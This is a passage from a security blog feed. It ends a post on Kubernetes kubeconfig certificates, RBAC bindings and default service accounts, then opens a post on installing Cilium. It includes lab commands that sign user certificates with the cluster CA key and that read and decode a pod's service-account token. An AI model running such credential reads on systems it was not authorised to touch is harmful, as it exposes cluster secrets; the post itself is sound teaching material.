<p>That’s where the magic lives — in this simple static config file. In the lab, it was created when the cluster was bootstrapped with <code>kubeadm</code>, and it uses a client certificate signed by the cluster’s Certificate Authority (CA).</p>
<p>The <code>client-certificate-data</code> and <code>client-key-data</code> fields are just base64-encoded TLS credentials: a certificate and private key that prove who you are to the Kubernetes API server. They’re signed by the cluster’s CA during bootstrap, which is why the API server trusts them without any further login. In short: when <code>kubectl</code> connects, it presents that cert–key pair, and the API server says, “yep, that’s my guy!”</p>
<p>The CA’s own certificates and keys live on every control-plane node under /etc/kubernetes/pki/. They’re not stored in etcd, as I once thought. Each control-plane node has a copy so it can verify incoming connections and issue new certs if it’s ever elected to run the API server.</p>
<p>It’s meant for bootstrapping, not daily use. But because it works — and because it never expires until the cert does — it quietly becomes the kubeconfig you keep using forever.</p>
<h3 id="heading-the-auth-chain-of-kubectl">The Auth Chain of kubectl</h3>
<p>Now that we know who we are, we can ask what actually happens when you run a simple command like:</p>
<pre><code class="lang-bash">kubectl get pods
</code></pre>
<p>Every part of your kubeconfig file gets pulled into action:</p>
<ol>
<li><p><strong>kubectl reads your current context</strong><br /> It looks up the <code>current-context</code> (<code>kubernetes-admin@kubernetes</code>) to find which <em>cluster</em> and <em>user</em> to use.</p>
</li>
<li><p><strong>kubectl authenticates to the API server</strong><br /> It connects to the cluster’s API endpoint (from <code>clusters.server</code>) and presents your client certificate and key (from <code>users.user</code>). This is mutual TLS.</p>
</li>
<li><p><strong>The API server validates your certificate</strong><br /> The API server checks your client certificate against the cluster’s CA, stored locally on the control-plane node under <code>/etc/kubernetes/pki/ca.crt</code>. If the signature is valid, it extracts the <strong>subject</strong> (like <code>CN=kubernetes-admin</code>) and uses that as your Kubernetes identity.</p>
</li>
<li><p><strong>Kubernetes decides what you’re allowed to do</strong><br /> Once authenticated, authorization kicks in. The API server checks your identity against <strong>RBAC roles and role bindings</strong>, which are stored in etcd. That’s what determines whether <code>kubectl get pods</code> returns a list — or a <code>Forbidden</code> message.</p>
</li>
<li><p><strong>Audit trail (if enabled)</strong><br /> Finally, the API server logs the request with your derived identity:</p>
<pre><code class="lang-bash"> user=<span class="hljs-string">"kubernetes-admin"</span> verb=<span class="hljs-string">"list"</span> resource=<span class="hljs-string">"pods"</span>
</code></pre>
</li>
</ol>
<p>In short, the chain looks like this:</p>
<pre><code class="lang-bash">kubectl → client certificate → API server → <span class="hljs-built_in">local</span> CA trust → RBAC (etcd)
</code></pre>
<p>It’s all local, self-contained, and cryptographically verified. Of course, if that client certificate gets shared or stolen, the API server will happily authenticate anyone holding it. There’s no MFA, no identity federation, and no notion of <em>who the human really was</em> behind the request.</p>
<hr />
<h2 id="heading-what-can-i-do">What Can I Do?</h2>
<p>Once the API server validates your identity, it moves from <strong>authentication</strong> to <strong>authorization</strong>. Every request coming into Kubernetes carries the user identity that was derived from your authentication method.</p>
<p>For example, after validating your client certificate, the API server sees you as:</p>
<pre><code class="lang-bash">user=<span class="hljs-string">"kubernetes-admin"</span>
groups=[<span class="hljs-string">"system:authenticated"</span>]
</code></pre>
<p>It now checks that identity against Kubernetes <strong>RBAC</strong> (Role-Based Access Control).</p>
<h3 id="heading-rbac-101">RBAC 101</h3>
<p>Kubernetes RBAC is built from four object types:</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Kind</td><td>Scope</td><td>Purpose</td></tr>
</thead>
<tbody>
<tr>
<td><strong>Role</strong></td><td>Namespaced</td><td>Set of allowed actions (<code>verbs</code>) on resources within a single namespace.</td></tr>
<tr>
<td><strong>ClusterRole</strong></td><td>Cluster-wide</td><td>Same as Role, but not bound to a namespace.</td></tr>
<tr>
<td><strong>RoleBinding</strong></td><td>Namespaced</td><td>Grants permissions defined in a Role to users, groups, or service accounts.</td></tr>
<tr>
<td><strong>ClusterRoleBinding</strong></td><td>Cluster-wide</td><td>Grants ClusterRole permissions across the entire cluster.</td></tr>
</tbody>
</table>
</div><p>Each Role or ClusterRole lists <em>verbs</em> (what actions you can take) and <em>resources</em> (what they apply to).<br />Bindings then link those rules to actual identities.</p>
<h3 id="heading-example-limiting-access">Example: Limiting Access</h3>
<p>Let’s see this in action by creating a restricted user and verifying permissions.</p>
<p><strong>Step 1 — Create a new user cert</strong></p>
<pre><code class="lang-bash">matt@controlplane:~/rbac$ openssl genrsa -out lab-user.key 2048
matt@controlplane:~/rbac$ openssl req -new -key lab-user.key -subj <span class="hljs-string">"/CN=lab-user/O=lab-users"</span> -out lab-user.csr
matt@controlplane:~/rbac$ sudo openssl x509 -req -<span class="hljs-keyword">in</span> lab-user.csr   -CA /etc/kubernetes/pki/ca.crt   -CAkey /etc/kubernetes/pki/ca.key   -CAcreateserial   -out lab-user.crt -days 365
Certificate request self-signature ok
subject=CN = lab-user, O = lab-users
</code></pre>
<p><strong>Step 2 — Add the user to your kubeconfig</strong></p>
<pre><code class="lang-bash">matt@controlplane:~/rbac$ kubectl config set-credentials lab-user   --client-certificate=lab-user.crt   --client-key=lab-user.key
User <span class="hljs-string">"lab-user"</span> <span class="hljs-built_in">set</span>.
matt@controlplane:~/rbac$ kubectl config set-context lab-user@kubernetes   --cluster=kubernetes --user=lab-user
Context <span class="hljs-string">"lab-user@kubernetes"</span> created.
</code></pre>
<p><strong>Step 3 — Try to access pods</strong></p>
<pre><code class="lang-bash">matt@controlplane:~/rbac$ kubectl --context lab-user@kubernetes get pods
Error from server (Forbidden): pods is forbidden: User <span class="hljs-string">"lab-user"</span> cannot list resource <span class="hljs-string">"pods"</span> <span class="hljs-keyword">in</span> API group <span class="hljs-string">""</span> <span class="hljs-keyword">in</span> the namespace <span class="hljs-string">"default"</span>
</code></pre>
<p><strong>Step 4 — Create a Role and RoleBinding</strong></p>
<pre><code class="lang-bash">matt@controlplane:~/rbac$ kubectl create role pod-reader --verb=get,list --resource=pods
role.rbac.authorization.k8s.io/pod-reader created
matt@controlplane:~/rbac$ kubectl create rolebinding pod-read-access   --role=pod-reader   --user=lab-user
rolebinding.rbac.authorization.k8s.io/pod-read-access created
</code></pre>
<p><strong>Step 5 — Verify access</strong></p>
<pre><code class="lang-bash">matt@controlplane:~/rbac$ kubectl auth can-i list pods --as lab-user
yes
matt@controlplane:~/rbac$ kubectl --context lab-user@kubernetes get pods
NAME                        READY   STATUS    RESTARTS      AGE
flask-app-ccb7dbb5b-5x5qw   1/1     Running   4 (7m ago)    12d
nginx-676b6c5bbc-45cmn      1/1     Running   12 (7m ago)   130d
</code></pre>
<p>Now we have it working for pods in the default namespace exactly as expected. That’s where AuthZ meets AuthN. I also cannot believe why that nginx pod is still running.</p>
<hr />
<h2 id="heading-cluster-rbac">Cluster RBAC</h2>
<p>If you list your ClusterRoles, the output tells the story of your entire cluster:</p>
<pre><code class="lang-bash">kubectl get clusterroles
</code></pre>
<p>You’ll see something like:</p>
<pre><code class="lang-bash">matt@controlplane:~/rbac$ kubectl get clusterroles
NAME                                                                   CREATED AT
admin                                                                  2024-10-17T19:53:04Z
argocd-application-controller                                          2024-10-17T20:27:44Z
...
calico-webhook-reader                                                  2024-10-17T19:55:28Z
cluster-admin                                                          2024-10-17T19:53:04Z
edit                                                                   2024-10-17T19:53:04Z
...
system:certificates.k8s.io:kube-apiserver-client-kubelet-approver      2024-10-17T19:53:04Z
system:certificates.k8s.io:kubelet-serving-approver                    2024-10-17T19:53:04Z
system:controller:attachdetach-controller                              2024-10-17T19:53:04Z
system:controller:certificate-controller                               2024-10-17T19:53:04Z
...
system:kube-dns                                                        2024-10-17T19:53:04Z
system:kube-scheduler                                                  2024-10-17T19:53:04Z
...
system:node-bootstrapper                                               2024-10-17T19:53:04Z
...
</code></pre>
<p>Those entries generally come from three places:</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Category</td><td>Example</td><td>Purpose</td></tr>
</thead>
<tbody>
<tr>
<td><strong>Built-in roles</strong></td><td><code>cluster-admin</code>, <code>edit</code></td><td>Human-facing defaults created by Kubernetes itself.</td></tr>
<tr>
<td><strong>System roles</strong></td><td><code>system:controller:*</code>, <code>system:node</code></td><td>Internal roles used by control-plane components and kubelets.</td></tr>
<tr>
<td><strong>Addon roles</strong></td><td><code>calico-*</code>, <code>argocd-*</code></td><td>Created by installed operators and charts.</td></tr>
</tbody>
</table>
</div><p>Each of these defines <strong>what</strong> actions are allowed (<code>verbs</code>) and <strong>where</strong> they apply (<code>resources</code>, <code>apiGroups</code>). Your authenticated user is matched to one of these via a <strong>RoleBinding</strong> or <strong>ClusterRoleBinding</strong>.</p>
<p>For example, the default bootstrap identity <code>kubernetes-admin</code> maps directly to the god-tier <code>cluster-admin</code> role:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">subjects:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">kind:</span> <span class="hljs-string">User</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">kubernetes-admin</span>
<span class="hljs-attr">roleRef:</span>
  <span class="hljs-attr">kind:</span> <span class="hljs-string">ClusterRole</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">cluster-admin</span>
</code></pre>
<p>That’s why everything “just works” in a fresh lab, but it also means you’re running as the same identity and privilege level as the cluster admin.</p>
<h3 id="heading-assigning-cluster-roles">Assigning Cluster Roles</h3>
<p>ClusterRoles define <em>what</em> can be done.  ClusterRoleBindings define <em>who</em> can do it.</p>
<p>You can see your bindings with:</p>
<pre><code class="lang-bash">kubectl get clusterrolebindings
</code></pre>
<p>Example from a kubeadm-based cluster:</p>
<pre><code class="lang-bash">kubeadm:cluster-admins                                          ClusterRole/cluster-admin                                                          253d
kubeadm:get-nodes                                               ClusterRole/kubeadm:get-nodes                                                      360d
kubeadm:kubelet-bootstrap                                       ClusterRole/system:node-bootstrapper                                               360d
kubeadm:node-autoapprove-bootstrap                              ClusterRole/system:certificates.k8s.io:certificatesigningrequests:nodeclient       360d
kubeadm:node-autoapprove-certificate-rotation                   ClusterRole/system:certificates.k8s.io:certificatesigningrequests:selfnodeclient   360d
kubeadm:node-proxier                                            ClusterRole/system:node-proxier                                                    360d
</code></pre>
<p>Each of these connects an identity (user, group, or service account) to a ClusterRole.</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Binding</td><td>Role</td><td>Subject</td><td>Purpose</td></tr>
</thead>
<tbody>
<tr>
<td><strong>kubeadm:cluster-admins</strong></td><td><code>cluster-admin</code></td><td>Group <code>kubeadm:cluster-admins</code></td><td>Grants full cluster-wide privileges.</td></tr>
<tr>
<td><strong>kubeadm:get-nodes</strong></td><td><code>kubeadm:get-nodes</code></td><td>Bootstrap group</td><td>Lets components read node info.</td></tr>
<tr>
<td><strong>kubeadm:kubelet-bootstrap</strong></td><td><code>system:node-bootstrapper</code></td><td><code>system:bootstrappers:kubeadm:default-node-token</code></td><td>Allows new nodes to register.</td></tr>
<tr>
<td><strong>kubeadm:node-autoapprove-bootstrap</strong></td><td><code>system:certificates.k8s.io:certificatesigningrequests:nodeclient</code></td><td><code>system:bootstrappers:kubeadm:default-node-token</code></td><td>Auto-approves node CSR during bootstrap.</td></tr>
<tr>
<td><strong>kubeadm:node-autoapprove-certificate-rotation</strong></td><td><code>system:certificates.k8s.io:certificatesigningrequests:selfnodeclient</code></td><td>Group <code>system:nodes</code></td><td>Lets kubelets rotate their client certs.</td></tr>
<tr>
<td><strong>kubeadm:node-proxier</strong></td><td><code>system:node-proxier</code></td><td>ServiceAccount <code>kube-system:kube-proxy</code></td><td>Lets <code>kube-proxy</code> manage endpoints and services.</td></tr>
</tbody>
</table>
</div><p>In short:</p>
<ul>
<li><p><strong>ClusterRoles</strong> define privileges.</p>
</li>
<li><p><strong>ClusterRoleBindings</strong> assign them to identities.</p>
</li>
<li><p>The API server enforces that mapping on every request.</p>
</li>
</ul>
<h3 id="heading-following-the-binding-chain">Following the Binding Chain</h3>
<p>Now let’s dig into the default admin binding:</p>
<pre><code class="lang-bash">matt@controlplane:~/rbac$ kubectl describe clusterrolebinding kubeadm:cluster-admins
Name:         kubeadm:cluster-admins
Labels:       &lt;none&gt;
Annotations:  &lt;none&gt;
Role:
  Kind:  ClusterRole
  Name:  cluster-admin
Subjects:
  Kind   Name                    Namespace
  ----   ----                    ---------
  Group  kubeadm:cluster-admins
</code></pre>
<p>Notice it doesn’t bind to a <strong>specific user</strong> — instead, it references a <strong>group</strong> that the user belongs to.<br />In your lab, that group mapping comes from the <strong>client certificate</strong> issued during cluster bootstrap.</p>
<p>You can inspect it yourself:</p>
<pre><code class="lang-bash">matt@controlplane:~/rbac$ kubectl config view --minify --raw -o jsonpath=<span class="hljs-string">'{.users[0].user.client-certificate-data}'</span> | base64 -d | openssl x509 -noout -subject
subject=O = system:masters, CN = kubernetes-admin
</code></pre>
<p>Here’s what that means:</p>
<ul>
<li><strong>CN (Common Name)</strong> → your username, <code>kubernetes-admin</code></li>
<li><strong>O (Organization)</strong> → your group, <code>system:masters</code></li>
</ul>
<p>When the API server validates this certificate, it extracts both:</p>
<pre><code class="lang-bash">User:  CN=kubernetes-admin
Group: O=system:masters
</code></pre>
<p>That <code>system:masters</code> group is special as it’s automatically bound to the <code>cluster-admin</code> role by default in kubeadm clusters.  In other words, anyone presenting a valid cert with <code>O=system:masters</code> skips straight to full admin rights.  It’s convenient for bootstrapping and that is probably its only advantage.</p>
<p>A quick peek at <code>system:masters</code> from its <code>ClusterRoleBinding</code>:</p>
<pre><code class="lang-bash">matt@controlplane:~$ kubectl get clusterrolebinding cluster-admin -o yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  annotations:
    rbac.authorization.kubernetes.io/autoupdate: <span class="hljs-string">"true"</span>
  creationTimestamp: <span class="hljs-string">"2024-10-17T19:53:04Z"</span>
  labels:
    kubernetes.io/bootstrapping: rbac-defaults
  name: cluster-admin
  resourceVersion: <span class="hljs-string">"134"</span>
  uid: 640338d1-5f25-4c59-bdca-893969ecb818
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: Group
  name: system:masters
</code></pre>
<p>That’s how your identity maps to permissions:</p>
<pre><code class="lang-bash">kubernetes-admin (user)
  ↓
system:masters (group)
  ↓
ClusterRoleBinding cluster-admin
  ↓
ClusterRole cluster-admin
</code></pre>
<p>Visualized:</p>
<pre><code class="lang-bash">Certificate (CN/O) → Authenticated User/Group → ClusterRoleBinding → ClusterRole → Permissions
</code></pre>
<p>This is the complete <strong>auth-to-RBAC chain</strong> that Kubernetes walks through on every API request — from certificate identity to effective privileges.</p>
<hr />
<h2 id="heading-users-vs-service-accounts">Users vs. Service Accounts</h2>
<p>Until now we’ve been talking about <strong>users</strong> — real people (or certificates pretending to be). But what about all the API calls in Kubernetes that don’t come from humans, the ones that come from <strong>pods</strong>.</p>
<p>Pods use <strong>service accounts</strong> to authenticate. These are actual Kubernetes objects, not external identities.</p>
<h3 id="heading-users-vs-service-accounts-1">Users vs Service Accounts</h3>
<p>Here is a basic assessment of Users and Service Accounts.</p>
<p>Users:</p>
<ul>
<li>Represent <strong>humans</strong> (or external systems).</li>
<li><strong>Not stored</strong> in Kubernetes. You authenticate via certificates, tokens, or OIDC, and Kubernetes just trusts what the API server tells it.</li>
<li>Example:<pre><code class="lang-bash">user=<span class="hljs-string">"kubernetes-admin"</span>
groups=[<span class="hljs-string">"system:masters"</span>,<span class="hljs-string">"system:authenticated"</span>]
</code></pre>
</li>
</ul>
<p>Service Accounts:</p>
<ul>
<li>Represent <strong>workloads</strong>.</li>
<li>Are <strong>real objects</strong> in the cluster:<pre><code class="lang-bash">kubectl get serviceaccounts -A
</code></pre>
</li>
<li>Live in namespaces, have tokens, and can be bound to Roles/ClusterRoles.</li>
<li>Example:<pre><code class="lang-bash">system:serviceaccount:default:myapp
</code></pre>
</li>
</ul>
<h3 id="heading-the-default-service-account">The Default Service Account</h3>
<p>Let's take a look at one service account in detail, the Default Service Account. And this will be looking at an nginx container in the <code>default</code> namespace.</p>
<p>Every namespace ships with a <code>default</code> ServiceAccount. If you don’t specify <code>serviceAccountName</code> in your Pod/Deployment, Kubernetes assigns <code>default</code> automatically and projects a short-lived JWT token into the pod.</p>
<p><strong>Verify the default SA exists (and why “Tokens: none” is normal now):</strong></p>
<pre><code class="lang-bash">matt@controlplane:~$ kubectl describe sa default -n default
Name:                default
Namespace:           default
Labels:              &lt;none&gt;
Annotations:         &lt;none&gt;
Image pull secrets:  &lt;none&gt;
Mountable secrets:   &lt;none&gt;
Tokens:              &lt;none&gt;
Events:              &lt;none&gt;
</code></pre>
<p><strong>Which SA is my nginx pod using?</strong> This will of course be different per test environment.</p>
<pre><code class="lang-bash">matt@controlplane:~$ kubectl get pod nginx-676b6c5bbc-45cmn -o jsonpath=<span class="hljs-string">'{.spec.serviceAccountName}'</span>
default
</code></pre>
<p><strong>See the live token in the pod (identity = service account):</strong></p>
<pre><code class="lang-bash">matt@controlplkubectl <span class="hljs-built_in">exec</span> -it nginx-676b6c5bbc-45cmn -- cat /var/run/secrets/kubernetes.io/serviceaccount/token/token
eyJhbGciOiJSUz...
</code></pre>
<p><strong>Decode the token payload locally (don’t upload it anywhere):</strong></p>
<pre><code class="lang-bash">TOKEN=<span class="hljs-string">'&lt;paste_the_value_above&gt;'</span>
<span class="hljs-built_in">echo</span> <span class="hljs-string">"<span class="hljs-variable">$TOKEN</span>"</span> | cut -d. -f2 | tr <span class="hljs-string">'_-'</span> <span class="hljs-string">'/+'</span> | base64 -d 2&gt;/dev/null | jq .
<span class="hljs-comment"># Look for:</span>
<span class="hljs-comment">#  "sub": "system:serviceaccount:default:default"</span>
<span class="hljs-comment">#  "iss": "https://kubernetes.default.svc.cluster.local"</span>
<span class="hljs-comment">#  "kubernetes.io": { "namespace": "default", "pod": { "name": "nginx-..." }, "serviceaccount": {"name":"default"} }</span>
</code></pre>
<p><strong>What can this identity actually do?</strong><br />There are two quick ways to check (without touching the pod):</p>
<p>1) <strong>From your admin shell, impersonate the SA for targeted checks:</strong></p>
<pre><code class="lang-bash">matt@controlplane:~$ kubectl auth can-i get secrets -n default --as system:serviceaccount:default:default
no
matt@controlplane:~$ kubectl auth can-i list pods -n default --as system:serviceaccount:default:default
no
</code></pre>
<p><strong>Or list everything allowed in the namespace:</strong></p>
<pre><code class="lang-bash">matt@controlplane:~/rbac$ kubectl auth can-i --list -n default --as system:serviceaccount:default:default
Resources                                       Non-Resource URLs                      Resource Names   Verbs
selfsubjectreviews.authentication.k8s.io        []                                     []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                                     []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                     []               [create]
globalnetworkpolicies.projectcalico.org         []                                     []               [get list watch create update patch delete deletecollection]
networkpolicies.projectcalico.org               []                                     []               [get list watch create update patch delete deletecollection]
                                                [/.well-known/openid-configuration/]   []               [get]
                                                [/api/*]                               []               [get]
                                                [/apis/*]                              []               [get]
                                                [/healthz]                             []               [get]
                                                [/livez]                               []               [get]
                                                [/openapi/*]                           []               [get]
                                                [/openid/v1/jwks/]                     []               [get]
                                                [/readyz]                              []               [get]
                                                [/version]                             []               [get]
</code></pre>
<p><strong>Why your nginx can “see” discovery but not much else:</strong><br />You likely won’t find any RoleBinding/ClusterRoleBinding that names <code>system:serviceaccount:default:default</code> directly.  Instead, the default SA inherits low-risk capabilities via <strong>groups</strong> that all service accounts are in:</p>
<ul>
<li><code>system:authenticated</code></li>
<li><code>system:serviceaccounts</code></li>
<li><code>system:serviceaccounts:default</code></li>
</ul>
<p>Check the group-based bindings you have:</p>
<pre><code class="lang-bash">kubectl get clusterrolebindings -o json | jq -r <span class="hljs-string">'
  .items[] | select(.subjects != null) |
  select(any(.subjects[]?;
    (.kind=="Group") and
    (.name=="system:authenticated" or .name=="system:serviceaccounts" or .name=="system:serviceaccounts:default")
  )) |
  .metadata.name + " -&gt; " + .roleRef.kind + "/" + .roleRef.name
'</span>
<span class="hljs-comment"># e.g.</span>
<span class="hljs-comment"># system:discovery -&gt; ClusterRole/system:discovery</span>
<span class="hljs-comment"># system:basic-user -&gt; ClusterRole/system:basic-user</span>
<span class="hljs-comment"># system:public-info-viewer -&gt; ClusterRole/system:public-info-viewer</span>
</code></pre>
<p><strong>Interpretation:</strong></p>
<ul>
<li><strong><code>system:discovery</code></strong> → API discovery endpoints (<code>/api</code>, <code>/apis</code>, <code>/version</code>, etc.)</li>
<li><strong><code>system:basic-user</code></strong> → “who am I” checks (SelfSubjectAccessReview / RulesReview)</li>
<li><strong><code>system:public-info-viewer</code></strong> → limited non-sensitive reads</li>
<li>(Add-ons like Calico may add their own minimal reads)</li>
</ul>
<p><strong>Avoid the Default Lifestyle:</strong></p>
<p>If you want to avoid using this there are a couple options.</p>
<ul>
<li>Set <code>serviceAccountName</code> explicitly per workload and bind the least privileges it needs.</li>
<li>Or disable auto-token mount when the pod doesn’t need the API:<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span> { <span class="hljs-attr">name:</span> <span class="hljs-literal">no</span><span class="hljs-string">-api</span> }
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">automountServiceAccountToken:</span> <span class="hljs-literal">false</span>
  <span class="hljs-attr">containers:</span> [{ <span class="hljs-attr">name:</span> <span class="hljs-string">c</span>, <span class="hljs-attr">image:</span> <span class="hljs-string">busybox</span>, <span class="hljs-attr">command:</span> [<span class="hljs-string">"sleep"</span>,<span class="hljs-string">"3600"</span>] }]
</code></pre>
</li>
</ul>
<p>That's how easy it can be to fix some little things.</p>
<hr />
<h2 id="heading-wrap-up">Wrap Up</h2>
<p>Kubernetes makes access look deceptively simple. Just a <code>kubeconfig</code> here, a service account there. But under the hood it’s a stack of implicit trust.  </p>
<ul>
<li>The <strong>API server</strong> trusts the <strong>CA</strong> that signed your client certs.  </li>
<li><strong>RBAC</strong> trusts whatever identity that cert or token presents.  </li>
<li>And <strong>you</strong> trust that nobody else has the same file sitting on their laptop.</li>
</ul>
<p>In this post we walked from <strong>SSH on the node</strong> → <strong>kubeconfig certificates</strong> → <strong>RBAC bindings</strong> → <strong>default service accounts</strong>.  Each step added some structure but not much accountability. Kubernetes is excellent at verifying that <em>someone</em> has permission but it just doesn’t always know <em>who that someone actually is.</em></p>
<p>Kubernetes RBAC might be remedial for many, but it is still something worth exploring in my opinion. Going through this deep dive actually taught me quite a bit. So I hope you found it helpful.</p>
<p>Next up, we’ll look at an option to better manage RBAC.  We’ll look at <strong>Teleport</strong>, a way to bring short-lived, auditable identity into Kubernetes access without rewriting how you work. </p>
]]></content:encoded></item><item><title><![CDATA[Service Boundaries:  The Cilium Way]]></title><description><![CDATA[In Part 2 we leveled up from basic NetworkPolicy to better cluster-wide guardrails using Calico. With global defaults and flow logs, we built something that worked.
That’s a solid foundation. Sounds a bit like what I thought of Network Policies befor...]]></description><link>https://cloudsecburrito.com/service-boundaries-the-cilium-way</link><guid isPermaLink="true">https://cloudsecburrito.com/service-boundaries-the-cilium-way</guid><category><![CDATA[hubble]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[cilium]]></category><category><![CDATA[networkpolicy]]></category><category><![CDATA[Security]]></category><category><![CDATA[observability]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Tue, 07 Oct 2025 20:50:27 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1759870057849/8dc7d548-a9a4-4dd1-b079-132ec5c6fba3.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In <a target="_blank" href="https://cloudsecburrito.com/service-boundaries-scaling-with-calico">Part 2</a> we leveled up from basic <code>NetworkPolicy</code> to better cluster-wide guardrails using Calico. With global defaults and flow logs, we built something that worked.</p>
<p>That’s a solid foundation. Sounds a bit like what I thought of Network Policies before Calico. But let’s be honest, we’re still only seeing half the picture. Calico and native <code>NetworkPolicy</code> both stop at L4: ports, IPs, and namespaces. Useful, but blind to what’s actually happening inside the connection. Was that a harmless health check or an attacker probing?</p>
<p>This is where <a target="_blank" href="https://docs.cilium.io/en/stable/">Cilium</a> steps in. It takes the same “who can talk to whom” model and extends it into “what can they do once connected.”</p>
<ul>
<li><p>L7 enforcement for HTTP, gRPC, Kafka, and DNS.</p>
</li>
<li><p>Identity-aware policies that track labels, not IPs.</p>
</li>
<li><p>Hubble observability so you can see and debug traffic at every layer.</p>
</li>
</ul>
<p>In other words, Cilium isn’t replacing Calico — it’s turning your network policies into application-aware security. Think of it as moving from guardrails to actual understanding. Let's get to it.</p>
<blockquote>
<p>Quick note: you’re not going to run Calico and Cilium together. They’re both CNIs, and this series focuses on boundaries, not datapath diplomacy. If you’re already all-in on Calico, this post is more about curiosity than configuration.</p>
</blockquote>
<hr />
<h2 id="heading-what-the-hell-is-cilium">What the Hell Is Cilium?</h2>
<p>If you’ve spent any time around Kubernetes networking, you’ve seen <strong>Cilium</strong> pop up. Yes, I said that before about Calico, but it's true. I would describe it as the CNI for <em>cool kids</em>, exuding <em>eBPF</em> goodness. But strip away my sarcasm, and it's actually pretty interesting.</p>
<p>Cilium isn’t just a CNI plugin. It’s a <strong>networking, security, and observability platform</strong> built on the Linux kernel’s <a target="_blank" href="https://ebpf.io/"><strong>extended Berkeley Packet Filter (eBPF)</strong></a> technology. Instead of using traditional iptables chains or Calico’s Felix agent to program kernel rules, Cilium compiles policies directly into lightweight, event-driven eBPF programs. Check out the link if you’re need an eBPF primer.</p>
<p>At its core, Cilium provides three big things:</p>
<ul>
<li><p><strong>Networking</strong> — a full CNI that routes packets using eBPF.</p>
</li>
<li><p><strong>Security</strong> — identity-based rules that enforce at L3, L4, and now <strong>L7</strong>.</p>
</li>
<li><p><strong>Observability</strong> — deep visibility into traffic, powered by <strong>Hubble</strong>.</p>
</li>
</ul>
<p>Because enforcement happens in the kernel, Cilium can <strong>see and understand every packet and flow</strong>, not just the ones that bubble up through Kubernetes Services. That’s what makes features like L7-aware HTTP and DNS policies possible without something like a service mesh.</p>
<p>If Calico was your <strong>scalable network policy engine</strong>, Cilium is your <strong>intelligent network policy engine</strong>. It understands <em>intent</em> and <em>context</em>, not just <em>ports and IPs</em>.</p>
<hr />
<h2 id="heading-deploying-cilium-arm-friendly-edition">Deploying Cilium (ARM-friendly edition)</h2>
<p>There are a few ways to set up Cilium for a lab. The easiest is to start with a fresh Ubuntu VM running Kubernetes 1.33. Talos is an option now, but we’ll stick with the usual full-control setup. You can follow along with the <a target="_blank" href="https://cloudsecburrito.com/from-scratch-to-cluster-kubernetes-on-mac-m1-with-utm">Kubernetes on Mac M1</a> article up to the point where we install Calico. Also, update Kubernetes 1.31 to 1.33 to keep things current.</p>
<p>Start by downloading Cilium and extracting it to <code>/usr/local/bin</code> for easy use. Just to note, we're using ARM, but you can easily swap this out if you're not on this architecture.</p>
<pre><code class="lang-bash">matt@ciliumcontrolplane:~$ curl -L --remote-name https://github.com/cilium/cilium-cli/releases/latest/download/cilium-linux-arm64.tar.gz

sudo tar xzvf cilium-linux-arm64.tar.gz -C /usr/<span class="hljs-built_in">local</span>/bin
</code></pre>
<p>Then use the following to install Cilium.</p>
<pre><code class="lang-bash">matt@ciliumcontrolplane:~$ cilium install --version 1.16.5
ℹ️  Using Cilium version 1.16.5
🔮 Auto-detected cluster name: kubernetes
🔮 Auto-detected kube-proxy has been installed
</code></pre>
<p>And don’t forget to remove your taint if you’re doing this on a single-node cluster and haven’t already. I almost always forget this one.</p>
<pre><code class="lang-bash">matt@ciliumcontrolplane:~$ kubectl taint nodes --all node-role.kubernetes.io/control-plane-
</code></pre>
<p>You can verify everything’s up by checking that the Cilium components are running in the <code>kube-system</code> namespace — or by running a <code>cilium connectivity test</code>. (I tried the test; it tried my patience. I killed it.)</p>
<pre><code class="lang-bash">matt@ciliumcontrolplane:~$ kubectl get po -A
NAMESPACE     NAME                                         READY   STATUS    RESTARTS   AGE
kube-system   cilium-9vxrz                                 1/1     Running   0          88s
kube-system   cilium-envoy-rnfsc                           1/1     Running   0          88s
kube-system   cilium-operator-799f498c8-lm989              1/1     Running   0          88s
kube-system   coredns-674b8bbfcf-5lxq8                     1/1     Running   0          6m5s
kube-system   coredns-674b8bbfcf-92xvg                     1/1     Running   0          6m5s
kube-system   etcd-ciliumcontrolplane                      1/1     Running   0          6m12s
kube-system   kube-apiserver-ciliumcontrolplane            1/1     Running   0          6m13s
kube-system   kube-controller-manager-ciliumcontrolplane   1/1     Running   0          6m12s
kube-system   kube-proxy-v97vg                             1/1     Running   0          6m5s
kube-system   kube-scheduler-ciliumcontrolplane            1/1     Running   0          6m13s
</code></pre>
<p>Now we're ready to roll.</p>
<hr />
<h2 id="heading-from-install-to-insight-baseline-cilium-behavior">From Install to Insight — Baseline Cilium Behavior</h2>
<p>Now that Cilium’s up and running, let’s see what it actually does out of the box. Turns out <strong>not much</strong>. So the cool stuff has to wait a little. Like every other Kubernetes CNI, Cilium starts in “wide-open” mode until you tell it otherwise. No policies, no restrictions — a free for all. No different than Calico-world in this regard. Let’s verify that before we start locking things down.</p>
<h3 id="heading-baseline-connectivity-test">Baseline Connectivity Test</h3>
<p>We’ll use the same simple three-tier app we’ve been deploying since Part 1. Save the following as <code>test-app.yaml</code>. Yes, this is long.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Namespace</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">frontend</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">tier:</span> <span class="hljs-string">frontend</span>
<span class="hljs-meta">---</span>
